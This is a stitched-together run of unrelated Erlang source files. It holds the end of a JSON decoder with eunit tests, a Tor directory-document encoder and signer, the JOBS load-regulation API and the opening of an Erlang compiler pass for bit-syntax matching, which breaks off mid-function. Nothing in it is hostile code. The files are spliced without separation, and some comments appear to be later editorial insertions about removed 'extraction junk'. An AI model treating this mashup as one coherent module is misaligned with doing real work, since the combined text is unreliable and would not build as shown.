handle_event(end_array, {[List, {key, Key}, Last|Terms], Opts}) ->
    {[[{Key, lists:reverse(List)}] ++ Last] ++ Terms, Opts};
handle_event(end_array, {[Current, Last|Terms], Opts}) ->
    {[[lists:reverse(Current)] ++ Last] ++ Terms, Opts};

%% A key is held on the stack until its value event arrives.
handle_event({key, Key}, {Terms, Opts}) -> {[{key, format_key(Key, Opts)}] ++ Terms, Opts};
handle_event({_, Event}, {[{key, Key}, Last|Terms], Opts}) ->
    {[[{Key, Event}] ++ Last] ++ Terms, Opts};
handle_event({_, Event}, {[Last|Terms], Opts}) ->
    {[[Event] ++ Last] ++ Terms, Opts}.
%% Convert an object key according to the labels option, matching the
%% record directly in the function head.
format_key(Key, #opts{labels = binary}) ->
    Key;
format_key(Key, #opts{labels = atom}) ->
    binary_to_atom(Key, utf8);
format_key(Key, #opts{labels = existing_atom}) ->
    binary_to_existing_atom(Key, utf8).
%% eunit tests
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
%% Smoke tests covering each JSON container and value kind.
basic_test_() ->
    [
     {"empty object", ?_assert(to_term(<<"{}">>, []) =:= [{}])},
     {"simple object", ?_assert(to_term(<<"{\"key\": true}">>, []) =:= [{<<"key">>, true}])},
     {"less simple object",
      ?_assert(to_term(<<"{\"a\": 1, \"b\": 2}">>, []) =:= [{<<"a">>, 1}, {<<"b">>, 2}])
     },
     {"nested object",
      ?_assert(to_term(<<"{\"key\": {\"key\": true}}">>, []) =:= [{<<"key">>, [{<<"key">>, true}]}])
     },
     {"empty array", ?_assert(to_term(<<"[]">>, []) =:= [])},
     {"list of lists",
      ?_assert(to_term(<<"[[],[],[]]">>, []) =:= [[], [], []])
     },
     {"list of strings",
      ?_assert(to_term(<<"[\"hi\", \"there\"]">>, []) =:= [<<"hi">>, <<"there">>])
     },
     {"list of numbers",
      ?_assert(to_term(<<"[1, 2.0, 3e4, -5]">>, []) =:= [1, 2.0, 3.0e4, -5])
     },
     {"list of literals",
      ?_assert(to_term(<<"[true,false,null]">>, []) =:= [true,false,null])
     },
     {"list of objects",
      ?_assert(to_term(<<"[{}, {\"a\":1, \"b\":2}, {\"key\":[true,false]}]">>, [])
               =:= [[{}], [{<<"a">>,1},{<<"b">>,2}], [{<<"key">>,[true,false]}]])
     }
    ].

%% Round-trips a document combining every construct in one input.
comprehensive_test_() ->
    {"comprehensive test", ?_assert(to_term(comp_json(), []) =:= comp_term())}.

comp_json() ->
    <<"[
{\"a key\": {\"a key\": -17.346, \"another key\": 3e152, \"last key\": 14}},
[0,1,2,3,4,5],
[{\"a\": \"a\", \"b\": \"b\"}, {\"c\": \"c\", \"d\": \"d\"}],
[true, false, null],
{},
[],
[{},{}],
{\"key\": [], \"another key\": {}}
]">>.

comp_term() ->
    [
     [{<<"a key">>, [{<<"a key">>, -17.346}, {<<"another key">>, 3.0e152}, {<<"last key">>, 14}]}],
     [0,1,2,3,4,5],
     [[{<<"a">>, <<"a">>}, {<<"b">>, <<"b">>}], [{<<"c">>, <<"c">>}, {<<"d">>, <<"d">>}]],
     [true, false, null],
     [{}],
     [],
     [[{}], [{}]],
     [{<<"key">>, []}, {<<"another key">>, [{}]}]
    ].

%% Same document decoded with {labels, atom}: keys become atoms.
atom_labels_test_() ->
    {"atom labels test", ?_assert(to_term(comp_json(), [{labels, atom}]) =:= atom_term())}.

atom_term() ->
    [
     [{'a key', [{'a key', -17.346}, {'another key', 3.0e152}, {'last key', 14}]}],
     [0,1,2,3,4,5],
     [[{a, <<"a">>}, {b, <<"b">>}], [{'c', <<"c">>}, {'d', <<"d">>}]],
     [true, false, null],
     [{}],
     [],
     [[{}], [{}]],
     [{key, []}, {'another key', [{}]}]
    ].

%% Bare (non-container) top-level values.
naked_test_() ->
    [
     {"naked integer", ?_assert(to_term(<<"123">>, []) =:= 123)},
     {"naked float", ?_assert(to_term(<<"-4.32e-17">>, []) =:= -4.32e-17)},
     {"naked literal", ?_assert(to_term(<<"true">>, []) =:= true)},
     {"naked string", ?_assert(to_term(<<"\"string\"">>, []) =:= <<"string">>)}
    ].
-endif.
%%%
%%% Copyright (c) 2016 The Talla Authors. All rights reserved.
%%% Use of this source code is governed by a BSD-style
%%% license that can be found in the LICENSE file.
%%%
%%% -----------------------------------------------------------
%%% @author <NAME> <<EMAIL>>
%%% @doc Document API.
%%%
%%% @end
%%% -----------------------------------------------------------
-module(onion_document).
%% API.
-export([decode/1,
encode/1,
get_item/2,
split/2,
ed25519_sign/2,
rsa_sign/2]).
-include("onion_test.hrl").
%% @doc Decode a Tor Document.
%%
%% Decodes a document according to the format described in section 1.2
%% of dir-spec.txt.
%%
%% @end
-spec decode(Data) -> {ok, [Item]} | {error, invalid_document}
    when
        Data :: binary(),
        Item :: {Keyword, Arguments, Object},
        Keyword :: atom() | binary(),
        Arguments :: binary(),
        Object :: term().
decode(<<>>) ->
    {ok, []};
decode(Document) when is_binary(Document) ->
    %% The lexer expects a string(); re-dispatch on the list form.
    decode(erlang:binary_to_list(Document));
decode(Document) ->
    %% Deliberately broad catch: any lexer/parser failure is normalised to
    %% {error, invalid_document} at this API boundary.
    try decode_(Document) of
        Items ->
            Items
    catch
        _Error:_WhatNow ->
            {error, invalid_document}
    end.

%% @private
%% Tokenise and parse; lets lexer/parser exceptions propagate to decode/1.
-spec decode_(Document) -> {ok, [Item]}
    when
        Document :: binary(),
        Item :: term().
decode_(Document) ->
    {ok, Tokens, _EndLine} = onion_document_lexer:string(Document),
    onion_document_parser:parse(Tokens).
%% @doc Encode a given Document into a binary.
%%
%% This function encodes a given Document into a binary. (The entries are
%% assembled as an iolist internally and flattened on return — the spec's
%% Data :: binary() is authoritative.)
%%
%% @end
-spec encode(Document) -> Data
    when
        Document :: [Item],
        Item :: {Keyword, Arguments, Objects},
        Keyword :: string() | atom() | binary(),
        Arguments :: [binary()],
        Objects :: [Object],
        Object :: term(),
        Data :: binary().
encode(Document) when is_list(Document) ->
    iolist_to_binary(lists:map(fun encode_entry/1, Document)).
%% Look up the first item in Document whose keyword matches Keyword
%% (after normalisation via keyword/1). Uses lists:keyfind/3, the
%% recommended replacement for the legacy lists:keysearch/3 (which
%% wraps its result in {value, _} for backward compatibility only).
-spec get_item(Keyword, Document) -> Item | not_found
    when
        Keyword :: binary(),
        Arguments :: [binary()],
        Object :: [binary()],
        Item :: {Keyword, Arguments} | {Keyword, Arguments, Object},
        Document :: [Item].
get_item(Keyword, Document) ->
    case lists:keyfind(keyword(Keyword), 1, Document) of
        false ->
            not_found;
        Item ->
            Item
    end.
%% Split Document into sub-documents, starting a new one at every item
%% whose keyword is Keyword. Items before the first occurrence form the
%% leading sub-document.
-spec split(Document, Keyword) -> [Document]
    when
        Keyword :: binary(),
        Arguments :: [binary()],
        Object :: [binary()],
        Item :: {Keyword, Arguments} | {Keyword, Arguments, Object},
        Document :: [Item].
split(Document, Keyword) ->
    split(Document, Keyword, [], []).

%% Accumulators: Data is the current sub-document (reversed), Result the
%% completed sub-documents (reversed).
split([], _Keyword, Data, Result) ->
    lists:reverse([lists:reverse(Data) | Result]);
split([{Keyword, _} = Item | Rest], Keyword, Data, Result) ->
    case Data of
        [] ->
            split(Rest, Keyword, [Item], Result);
        _ ->
            split(Rest, Keyword, [Item], [lists:reverse(Data) | Result])
    end;
split([{Keyword, _, _} = Item | Rest], Keyword, Data, Result) ->
    case Data of
        [] ->
            split(Rest, Keyword, [Item], Result);
        _ ->
            split(Rest, Keyword, [Item], [lists:reverse(Data) | Result])
    end;
split([Item | Rest], Keyword, Data, Result) ->
    split(Rest, Keyword, [Item | Data], Result).
%% Append a router-sig-ed25519 item. The signature covers the encoded
%% document including an empty signature placeholder, prefixed with the
%% "Tor router descriptor signature v1" string.
ed25519_sign(Document, SecretKey) ->
    EncodedDocument = encode(Document ++ [{'router-sig-ed25519', [<<>>]}]),
    Prefix = <<"Tor router descriptor signature v1">>,
    Signature = onion_ed25519:sign(<<Prefix/binary, EncodedDocument/binary>>, SecretKey),
    Document ++ [{'router-sig-ed25519', [onion_base64:encode(Signature)]}].

%% Append a router-signature item: the SHA-1 digest of the document
%% (with the bare router-signature line included) is RSA-signed with
%% PKCS#1 padding and attached as a SIGNATURE object.
rsa_sign(Document, SecretKey) ->
    EncodedDocument = encode(Document ++ [{'router-signature', []}]),
    Hash = crypto:hash(sha, EncodedDocument),
    Signature = onion_rsa:private_encrypt(Hash, SecretKey, rsa_pkcs1_padding),
    Document ++ [{'router-signature', [], [{'SIGNATURE', Signature}]}].
%% @private
%% Normalise a keyword (atom, string, integer or binary) to binary form.
-spec keyword(term()) -> binary().
keyword(V) when is_binary(V) ->
    V;
keyword(V) when is_atom(V) ->
    atom_to_binary(V, latin1);
keyword(V) when is_integer(V) ->
    integer_to_binary(V);
keyword(V) when is_list(V) ->
    list_to_binary(V).
%% @private
%% Encode each argument in order. This is exactly a map over the list,
%% replacing the previous hand-rolled accumulate-and-reverse loop.
encode_arguments(Arguments) ->
    lists:map(fun encode_argument/1, Arguments).
%% @private
%% Render a single argument: datetime tuples become "YYYY-MM-DD HH:MM:SS"
%% (zero-padded); anything else is passed through unchanged.
encode_argument({datetime, {{Year, Month, Day}, {Hour, Minute, Second}}}) ->
    onion_string:format("~4..0b-~2..0b-~2..0b ~2..0b:~2..0b:~2..0b",
                        [Year, Month, Day, Hour, Minute, Second]);
encode_argument(Argument) ->
    Argument.
%% @private
%% Render one document entry as "keyword arg1 arg2 ...\n" followed by any
%% PEM-style objects. A two-tuple entry is treated as having no objects,
%% and a plain list of entries is encoded element-wise.
-spec encode_entry(DocumentEntry) -> iolist()
    when
        DocumentEntry :: {Keyword, Arguments, Objects},
        Keyword :: string() | atom() | binary(),
        Arguments :: [binary()],
        Objects :: [Object],
        Object :: term().
encode_entry({Keyword, Arguments}) ->
    encode_entry({Keyword, Arguments, []});
encode_entry({Keyword, Arguments, Objects}) ->
    [onion_lists:intersperse(<<" ">>, lists:map(fun keyword/1, [keyword(Keyword) | encode_arguments(Arguments)])), <<"\n">>,
     lists:map(fun encode_object/1, Objects)];
encode_entry(List) when is_list(List) ->
    lists:map(fun encode_entry/1, List).

%% @private
%% Render an attached object as a PEM-style block.
-spec encode_object(Object) -> iolist()
    when
        Object :: term().
encode_object({Type, Data}) ->
    [onion_pem:encode(Type, Data)].
-ifdef(TEST).
%% Exercises empty input, bare keywords, keywords with arguments, an
%% attached PEM-style object, and a malformed document.
decode_basic_test() ->
    [
        ?assertEqual(decode(<<>>), {ok, []}),
        ?assertEqual(decode(<<"foobar">>), {ok, [{foobar, no_arguments, no_object}]}),
        ?assertEqual(decode(<<"foobar\nfoobar\n">>), {ok, [
            {foobar, no_arguments, no_object},
            {foobar, no_arguments, no_object}
        ]}),
        ?assertEqual(decode(<<"foo a b c\nbar d e f\n">>), {ok, [
            {foo, <<"a b c">>, no_object},
            {bar, <<"d e f">>, no_object}
        ]}),
        ?assertEqual(decode(<<"foo\n-----BEGIN foobar-----\nblah\n-----END foobar-----\n">>),
            {ok, [
                {foo, no_arguments, {<<"foobar">>, <<"blah">>}}
            ]}),
        ?assertEqual(decode(<<"?foo\n">>), {error, invalid_document})
    ].
-endif.
%%==============================================================================
%% Copyright 2010 Erlang Solutions Ltd.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%==============================================================================
%%-------------------------------------------------------------------
%% File : jobs.erl
%% @author : <NAME> <<EMAIL>>
%% @doc
%% This is the public API of the JOBS framework.
%%
%% @end
%% Created : 15 Jan 2010 by <NAME> <<EMAIL>>
%%-------------------------------------------------------------------
-module(jobs).
-export([ask/1,
done/1,
job_info/1,
run/2,
enqueue/2,
dequeue/2]).
-export([ask_queue/2]).
%% Configuration API
-export([add_queue/2,
delete_queue/1,
info/1,
queue_info/1,
queue_info/2,
modify_regulator/4,
add_counter/2,
modify_counter/2,
delete_counter/1,
add_group_rate/2,
modify_group_rate/2,
delete_group_rate/1]).
%% @spec ask(Type) -> {ok, Opaque} | {error, Reason}
%% @doc Asks permission to run a job of Type. Returns when permission granted.
%%
%% The simplest way to have jobs regulated is to spawn a request per job.
%% The process should immediately call this function, and when granted
%% permission, execute the job, and then terminate.
%% If for some reason the process needs to remain, to execute more jobs,
%% it should explicitly call `jobs:done(Opaque)'.
%% This is not strictly needed when regulation is rate-based, but as the
%% regulation strategy may change over time, it is the prudent thing to do.
%% @end
%%
%% Delegates to the node-local jobs_server.
ask(Type) ->
    jobs_server:ask(Type).

%% @spec done(Opaque) -> ok
%% @doc Signals completion of an executed task.
%%
%% This is used when the current process wants to submit more jobs to load
%% regulation. It is mandatory when performing counter-based regulation
%% (unless the process terminates after completing the task). It has no
%% effect if the job type is purely rate-regulated.
%% @end
%%
%% Pass the Opaque value returned by ask/1 or run/2.
done(Opaque) ->
    jobs_server:done(Opaque).
%% @spec run(Type, Function::function()) -> Result
%% @doc Executes Function() when permission has been granted by job regulator.
%%
%% This is equivalent to performing the following sequence:
%% <pre>
%% case jobs:ask(Type) of
%%    {ok, Opaque} ->
%%       try Function()
%%         after
%%           jobs:done(Opaque)
%%       end;
%%    {error, Reason} ->
%%       erlang:error(Reason)
%% end.
%% </pre>
%% @end
%%
%% The fun may take zero arguments or one (see jobs_server:run/2).
run(Queue, F) when is_function(F, 0); is_function(F, 1) ->
    jobs_server:run(Queue, F).

%% Add Item to the named queue (delegates to jobs_server:enqueue/2).
enqueue(Queue, Item) ->
    jobs_server:enqueue(Queue, Item).

%% Fetch up to N items (infinity = no limit) from the named queue
%% (delegates to jobs_server:dequeue/2).
dequeue(Queue, N) when N =:= infinity; is_integer(N), N > 0 ->
    jobs_server:dequeue(Queue, N).
%% @spec job_info(Opaque) -> undefined | Info
%% @doc Retrieves job-specific information from the `Opaque' data object.
%%
%% The queue could choose to return specific information that is passed to a
%% granted job request. This could be used e.g. for load-balancing strategies.
%% @end
%%
%% The Opaque value is the second element of the tuple returned by ask/1.
job_info({_, Opaque}) ->
    proplists:get_value(info, Opaque).

%% @spec add_queue(Name::any(), Options::[{Key,Value}]) -> ok
%% @doc Installs a new queue in the load regulator on the current node.
%% @end
%%
add_queue(Name, Options) ->
    jobs_server:add_queue(Name, Options).

%% @spec delete_queue(Name) -> boolean()
%% @doc Deletes the named queue from the load regulator on the current node.
%% Returns `true' if there was in fact such a queue; `false' otherwise.
%% @end
%%
delete_queue(Name) ->
    jobs_server:delete_queue(Name).
%% @spec ask_queue(QueueName, Request) -> Reply
%% @doc Sends a synchronous request to a specific queue.
%%
%% This function is mainly intended to be used for back-end processes that act
%% as custom extensions to the load regulator itself. It should not be used by
%% regular clients. Sophisticated queue behaviours could export gen_server-like
%% logic allowing them to respond to synchronous calls, either for special
%% inspection, or for influencing the queue state.
%% @end
%%
ask_queue(QueueName, Request) ->
    jobs_server:ask_queue(QueueName, Request).

%% @spec add_counter(Name, Options) -> ok
%% @doc Adds a named counter to the load regulator on the current node.
%% Fails if there already is a counter the name `Name'.
%% @end
%%
add_counter(Name, Options) ->
    jobs_server:add_counter(Name, Options).

%% @spec delete_counter(Name) -> boolean()
%% @doc Deletes a named counter from the load regulator on the current node.
%% Returns `true' if there was in fact such a counter; `false' otherwise.
%% @end
%%
delete_counter(Name) ->
    jobs_server:delete_counter(Name).

%% @spec add_group_rate(Name, Options) -> ok
%% @doc Adds a group rate regulator to the load regulator on the current node.
%% Fails if there is already a group rate regulator of the same name.
%% @end
%%
add_group_rate(Name, Options) ->
    jobs_server:add_group_rate(Name, Options).

%% Remove the named group rate regulator.
delete_group_rate(Name) ->
    jobs_server:delete_group_rate(Name).

%% Query the regulator for the given information item.
info(Item) ->
    jobs_server:info(Item).

%% Full information about the named queue.
queue_info(Name) ->
    jobs_server:queue_info(Name).

%% A single information item about the named queue.
queue_info(Name, Item) ->
    jobs_server:queue_info(Name, Item).
%% Reconfigure an existing counter or rate regulator attached to a queue.
modify_regulator(Type, QName, RegName, Opts) when Type==counter;Type==rate ->
    jobs_server:modify_regulator(Type, QName, RegName, Opts).

%% Reconfigure a named counter. (The closing line of modify_group_rate/2
%% previously had extraction junk fused onto it; it has been removed.)
modify_counter(CName, Opts) ->
    jobs_server:modify_counter(CName, Opts).

%% Reconfigure a named group rate regulator.
modify_group_rate(GRName, Opts) ->
    jobs_server:modify_group_rate(GRName, Opts).
%%
%% %CopyrightBegin%
%%
%% Copyright Ericsson AB 2018. All Rights Reserved.
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% %CopyrightEnd%
%%
%%%
%%% This pass optimizes bit syntax matching, and is centered around the concept
%%% of "match context reuse" which is best explained through example. To put it
%%% shortly we attempt to turn this:
%%%
%%% <<0,B/bits>> = A,
%%% <<1,C/bits>> = B,
%%% <<D,_/bits>> = C,
%%% D.
%%%
%%% ... Into this:
%%%
%%% <<0,1,D,_/bits>>=A,
%%% D.
%%%
%%% Which is much faster as it avoids the creation of intermediate terms. This
%%% is especially noticeable in loops where such garbage is generated on each
%%% iteration.
%%%
%%% The optimization itself is very simple and can be applied whenever there's
%%% matching on the tail end of a binary; instead of creating a new binary and
%%% starting a new match context on it, we reuse the match context used to
%%% extract the tail and avoid the creation of both objects.
%%%
%%% The catch is that a match context isn't a proper type and nothing outside
%%% of bit syntax match operations can handle them. We therefore need to make
%%% sure that they never "leak" into other instructions, and most of the pass
%%% revolves around getting around that limitation.
%%%
%%% Unlike most other passes we look at the whole module so we can combine
%%% matches across function boundaries, greatly increasing the performance of
%%% complex matches and loops.
%%%
-module(beam_ssa_bsm).
-export([module/2, format_error/1]).
-include("beam_ssa.hrl").
-include("beam_types.hrl").
-import(lists, [member/2, reverse/1, splitwith/2, map/2, foldl/3, mapfoldl/3,
nth/2, max/1, unzip/1]).
%% Turn a bin_opt_info finding into a human-readable warning string.
-spec format_error(term()) -> nonempty_string().
format_error(OptInfo) ->
    format_opt_info(OptInfo).
%% Pass entry point: analyze the whole module, run the sub-pass pipeline
%% over its functions, and optionally collect bin_opt_info warnings.
-spec module(Module, Options) -> Result when
      Module :: beam_ssa:b_module(),
      Options :: [compile:option()],
      Result :: {ok, beam_ssa:b_module(), list()}.

-define(PASS(N), {N,fun N/1}).

module(#b_module{body=Fs0}=Module, Opts) ->
    ModInfo = analyze_module(Module),

    %% combine_matches is repeated after accept_context_args as the control
    %% flow changes can enable further optimizations, as in the example below:
    %%
    %%    a(<<0,X/binary>>) -> a(X);
    %%    a(A) when bit_size(A) =:= 52 -> bar;
    %%    a(<<1,X/binary>>) -> X.    %% Match context will be reused here when
    %%                               %% when repeated.
    {Fs, _} = compile:run_sub_passes(
                [?PASS(combine_matches),
                 ?PASS(accept_context_args),
                 ?PASS(combine_matches),
                 ?PASS(allow_context_passthrough),
                 ?PASS(skip_outgoing_tail_extraction),
                 ?PASS(annotate_context_parameters)],
                {Fs0, ModInfo}),

    Ws = case proplists:get_bool(bin_opt_info, Opts) of
             true -> collect_opt_info(Fs);
             false -> []
         end,

    {ok, Module#b_module{body=Fs}, Ws}.
-type module_info() :: #{ func_id() => func_info() }.
-type func_id() :: {Name :: atom(), Arity :: non_neg_integer()}.
-type func_info() :: #{ has_bsm_ops => boolean(),
parameters => [#b_var{}],
parameter_info => #{ #b_var{} => param_info() } }.
-type param_info() :: suitable_for_reuse |
{Problem :: atom(), Where :: term()}.
%% Build the initial module_info() map: one entry per function recording
%% its parameter list, whether it contains bit-syntax matching at all,
%% and an empty parameter_info map to be filled in by later sub-passes.
-spec analyze_module(#b_module{}) -> module_info().
analyze_module(#b_module{body=Fs}) ->
    foldl(fun(#b_function{args=Parameters}=F, I) ->
                  FuncInfo = #{ has_bsm_ops => has_bsm_ops(F),
                                parameters => Parameters,
                                parameter_info => #{} },
                  FuncId = get_fa(F),
                  I#{ FuncId => FuncInfo }
          end, #{}, Fs).
%% True if any block of the function contains a bs_start_match
%% instruction, i.e. the function does bit-syntax matching at all.
has_bsm_ops(#b_function{bs=Blocks}) ->
    hbo_blocks(maps:to_list(Blocks)).

hbo_blocks([{_Lbl, #b_blk{is=Is}} | Rest]) ->
    hbo_is(Is) orelse hbo_blocks(Rest);
hbo_blocks([]) ->
    false.

hbo_is(Is) ->
    lists:any(fun(#b_set{op=bs_start_match}) -> true;
                 (_) -> false
              end, Is).
%% Checks whether it's legal to make a call with the given argument as a match
%% context, returning the param_info() of the relevant parameter.
-spec check_context_call(#b_set{}, Arg, CtxChain, ModInfo) -> param_info() when
      Arg :: #b_var{},
      CtxChain :: [#b_var{}],
      ModInfo :: module_info().
check_context_call(#b_set{args=Args}, Arg, CtxChain, ModInfo) ->
    %% Every context in the extraction chain aliases the same underlying
    %% match context as Arg itself.
    Aliases = [Arg | CtxChain],
    ccc_1(Args, Arg, Aliases, ModInfo).

ccc_1([#b_local{}=Call | Args], Ctx, Aliases, ModInfo) ->
    %% Matching operations assume that their context isn't aliased (as in
    %% pointer aliasing), so we must reject calls whose arguments contain more
    %% than one reference to the context.
    %%
    %% TODO: Try to fall back to passing binaries in these cases. Partial reuse
    %% is better than nothing.
    UseCount = foldl(fun(Arg, C) ->
                             case member(Arg, Aliases) of
                                 true -> C + 1;
                                 false -> C
                             end
                     end, 0, Args),
    if
        UseCount =:= 1 ->
            #b_local{name=#b_literal{val=Name},arity=Arity} = Call,
            Callee = {Name, Arity},

            %% The callee's corresponding parameter must itself have been
            %% marked as suitable for context reuse by an earlier pass.
            ParamInfo = funcinfo_get(Callee, parameter_info, ModInfo),
            Parameters = funcinfo_get(Callee, parameters, ModInfo),
            Parameter = nth(1 + arg_index(Ctx, Args), Parameters),

            case maps:find(Parameter, ParamInfo) of
                {ok, suitable_for_reuse} ->
                    suitable_for_reuse;
                {ok, Other} ->
                    {unsuitable_call, {Call, Other}};
                error ->
                    {no_match_on_entry, Call}
            end;
        UseCount > 1 ->
            {multiple_uses_in_call, Call}
    end;
ccc_1([#b_remote{}=Call | _Args], _Ctx, _CtxChain, _ModInfo) ->
    %% Remote functions cannot be assumed to accept match contexts.
    {remote_call, Call};
ccc_1([Fun | _Args], _Ctx, _CtxChain, _ModInfo) ->
    %% TODO: It may be possible to support this in the future for locally
    %% defined funs, including ones with free variables.
    {fun_call, Fun}.
%% Zero-based position of Var within Args (Var must be present).
arg_index(Var, Args) ->
    arg_index_1(Var, Args, 0).

arg_index_1(Var, [Var | _Rest], Index) ->
    Index;
arg_index_1(Var, [_Other | Rest], Index) ->
    arg_index_1(Var, Rest, Index + 1).
%% True if the instruction extracts the tail (all remaining bits) of a
%% match context: either a bs_match of type binary with size `all', or a
%% bs_get_tail.
is_tail_binary(#b_set{op=bs_match,args=[#b_literal{val=binary} | Rest]}) ->
    member(#b_literal{val=all}, Rest);
is_tail_binary(#b_set{op=bs_get_tail}) ->
    true;
is_tail_binary(_) ->
    false.

%% As is_tail_binary/1, but starting from the variable the value was
%% bound to, resolved through the definition map.
is_tail_binary(#b_var{}=Var, Defs) ->
    case find_match_definition(Var, Defs) of
        {ok, Def} -> is_tail_binary(Def);
        _ -> false
    end;
is_tail_binary(_Literal, _Defs) ->
    false.

%% Sanity check: Var must resolve, through a chain of bs_match
%% instructions, to a bs_start_match. Crashes (no matching clause)
%% otherwise.
assert_match_context(#b_var{}=Var, Defs) ->
    case maps:find(Var, Defs) of
        {ok, #b_set{op=bs_match,args=[_,#b_var{}=Ctx|_]}} ->
            assert_match_context(Ctx, Defs);
        {ok, #b_set{op=bs_start_match}} ->
            ok
    end.

%% The instruction that produced Var's value: for a bs_extract this is
%% the preceding match instruction; a bs_get_tail stands on its own.
find_match_definition(#b_var{}=Var, Defs) ->
    case maps:find(Var, Defs) of
        {ok, #b_set{op=bs_extract,args=[Ctx]}} -> maps:find(Ctx, Defs);
        {ok, #b_set{op=bs_get_tail}=Def} -> {ok, Def};
        _ -> error
    end.

%% Returns a list of all contexts that were used to extract Var.
context_chain_of(#b_var{}=Var, Defs) ->
    case maps:find(Var, Defs) of
        {ok, #b_set{op=bs_match,args=[_,#b_var{}=Ctx|_]}} ->
            [Ctx | context_chain_of(Ctx, Defs)];
        {ok, #b_set{op=bs_get_tail,args=[Ctx]}} ->
            [Ctx | context_chain_of(Ctx, Defs)];
        {ok, #b_set{op=bs_extract,args=[Ctx]}} ->
            [Ctx | context_chain_of(Ctx, Defs)];
        _ ->
            []
    end.

%% Grabs the match context used to produce the given variable.
match_context_of(#b_var{}=Var, Defs) ->
    Ctx = match_context_of_1(Var, Defs),
    assert_match_context(Ctx, Defs),
    Ctx.

match_context_of_1(Var, Defs) ->
    case maps:get(Var, Defs) of
        #b_set{op=bs_extract,args=[#b_var{}=Ctx0]} ->
            #b_set{op=bs_match,
                   args=[_,#b_var{}=Ctx|_]} = maps:get(Ctx0, Defs),
            Ctx;
        #b_set{op=bs_get_tail,args=[#b_var{}=Ctx]} ->
            Ctx
    end.
%% Looks up Attribute for a function in the module-wide info map. The
%% function is identified either by its #b_function{} record (converted
%% to a {Name,Arity} key) or directly by that key. Crashes (badkey) if
%% the function or attribute is missing.
funcinfo_get(#b_function{}=F, Attribute, ModInfo) ->
    funcinfo_get(get_fa(F), Attribute, ModInfo);
funcinfo_get({_,_}=Key, Attribute, ModInfo) ->
    FuncInfo = maps:get(Key, ModInfo),
    maps:get(Attribute, FuncInfo).

%% Sets Attribute to Value for a function in the module-wide info map,
%% creating the per-function map if it does not exist yet.
funcinfo_set(#b_function{}=F, Attribute, Value, ModInfo) ->
    funcinfo_set(get_fa(F), Attribute, Value, ModInfo);
funcinfo_set(Key, Attribute, Value, ModInfo) ->
    FuncInfo = maps:put(Attribute, Value, maps:get(Key, ModInfo, #{})),
    maps:put(Key, FuncInfo, ModInfo).

%% Extracts the {Name,Arity} identity of a function from its func_info
%% annotation (the first element, the module, is not needed here).
get_fa(#b_function{ anno = Anno }) ->
    {_,Name,Arity} = maps:get(func_info, Anno),
    {Name,Arity}.
%% Replaces matched-out binaries with aliases that are lazily converted to
%% binary form when used, allowing us to keep the "match path" free of binary
%% creation.
-spec alias_matched_binaries(Blocks, Counter, AliasMap) -> Result when
      Blocks :: beam_ssa:block_map(),
      Counter :: non_neg_integer(),
      Result :: {Blocks, Counter},
      AliasMap :: match_alias_map().

-type match_alias_map() ::
        #{ Binary :: #b_var{} =>
               { %% Replace all uses of Binary with an alias after this
                 %% label.
                 AliasAfter :: beam_ssa:label(),
                 %% The match context whose tail is equal to Binary.
                 Context :: #b_var{} } }.

%% Keeps track of the promotions we need to insert. They're partially keyed by
%% location because they may not be valid on all execution paths and we may
%% need to add redundant promotions in some cases.
-type promotion_map() ::
        #{ { PromoteAt :: beam_ssa:label(),
             Variable :: #b_var{} } =>
               Instruction :: #b_set{} }.

%% State threaded through the alias pass; `promotions` accumulates the
%% bs_get_tail instructions to insert afterwards.
-record(amb, { dominators :: beam_ssa:dominator_map(),
               match_aliases :: match_alias_map(),
               cnt :: non_neg_integer(),
               promotions = #{} :: promotion_map() }).

%% Walks all blocks, replacing uses of aliased binaries, then inserts the
%% accumulated bs_get_tail promotions. The empty-map clause is a cheap
%% short-circuit when there is nothing to alias.
alias_matched_binaries(Blocks0, Counter, AliasMap) when AliasMap =/= #{} ->
    {Dominators, _} = beam_ssa:dominators(Blocks0),
    State0 = #amb{ dominators = Dominators,
                   match_aliases = AliasMap,
                   cnt = Counter },
    {Blocks, State} = beam_ssa:mapfold_blocks_rpo(fun amb_1/3, [0], State0,
                                                  Blocks0),
    {amb_insert_promotions(Blocks, State), State#amb.cnt};
alias_matched_binaries(Blocks, Counter, _AliasMap) ->
    {Blocks, Counter}.
%% Rewrites a single block: every instruction argument and the terminator
%% argument are passed through amb_get_alias/3.
amb_1(Lbl, #b_blk{is=Is0,last=Last0}=Block, State0) ->
    {Is, State1} = mapfoldl(fun(I, State) ->
                                    amb_assign_set(I, Lbl, State)
                            end, State0, Is0),
    {Last, State} = amb_assign_last(Last0, Lbl, State1),
    {Block#b_blk{is=Is,last=Last}, State}.

amb_assign_set(#b_set{op=phi,args=Args0}=I, _Lbl, State0) ->
    %% Phi node aliases are relative to their source block, not their
    %% containing block.
    {Args, State} =
        mapfoldl(fun({Arg0, Lbl}, Acc) ->
                         {Arg, State} = amb_get_alias(Arg0, Lbl, Acc),
                         {{Arg, Lbl}, State}
                 end, State0, Args0),
    {I#b_set{args=Args}, State};
amb_assign_set(#b_set{args=Args0}=I, Lbl, State0) ->
    {Args, State} = mapfoldl(fun(Arg0, Acc) ->
                                     amb_get_alias(Arg0, Lbl, Acc)
                             end, State0, Args0),
    {I#b_set{args=Args}, State}.

%% Rewrites the single value argument of each terminator kind (return,
%% switch, branch).
amb_assign_last(#b_ret{arg=Arg0}=T, Lbl, State0) ->
    {Arg, State} = amb_get_alias(Arg0, Lbl, State0),
    {T#b_ret{arg=Arg}, State};
amb_assign_last(#b_switch{arg=Arg0}=T, Lbl, State0) ->
    {Arg, State} = amb_get_alias(Arg0, Lbl, State0),
    {T#b_switch{arg=Arg}, State};
amb_assign_last(#b_br{bool=Arg0}=T, Lbl, State0) ->
    {Arg, State} = amb_get_alias(Arg0, Lbl, State0),
